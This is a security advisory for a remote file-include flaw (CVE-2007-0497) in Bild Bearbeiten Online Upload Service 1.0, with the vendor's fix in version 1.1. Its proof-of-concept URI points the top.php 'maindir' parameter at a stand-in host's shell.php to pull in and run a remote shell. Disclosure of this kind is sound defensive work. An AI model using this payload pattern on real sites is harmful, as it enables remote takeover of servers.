Bild Bearbeiten Online Upload Service Top.PHP Remote File Include Vulnerability
BID:22189
Info
Bild Bearbeiten Online Upload Service Top.PHP Remote File Include Vulnerability
| Bugtraq ID: | 22189 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0497 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 22 2007 12:00AM |
| Updated: | May 12 2015 07:35PM |
| Credit: | Ahmad Muammar W.K (a.k.a) y3dips is credited with the discovery of this vulnerability. |
| Vulnerable: |
Bild Bearbeiten Online Upload Service 1.0 |
| Not Vulnerable: |
Bild Bearbeiten Online Upload Service 1.1 |
Discussion
Bild Bearbeiten Online Upload Service Top.PHP Remote File Include Vulnerability
Bild Bearbeiten Online Upload Service is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 1.0 is vulnerable; other versions may also be affected.
Bild Bearbeiten Online Upload Service is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Bild Bearbeiten Online Upload Service Top.PHP Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/upload/top.php?maindir=http://www.example2.com/shell.php?
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/upload/top.php?maindir=http://www.example2.com/shell.php?
Solution / Fix
Bild Bearbeiten Online Upload Service Top.PHP Remote File Include Vulnerability
Solution:
The vendor has released version 1.1 to address this issue.
Bild Bearbeiten Online Upload Service 1.0
Solution:
The vendor has released version 1.1 to address this issue.
Bild Bearbeiten Online Upload Service 1.0
-
Bild Bearbeiten Online upload_service_1.1.zip
http://bild-bearbeiten.de/scripts/upload_service_1.1.zip
References
Bild Bearbeiten Online Upload Service Top.PHP Remote File Include Vulnerability
References:
References:
- Vendor Homepage (Bild Bearbeiten Online)
- Upload Service 1.0 remote file inclusion (Ahmad Muammar W.K (a.k.a) y3dips )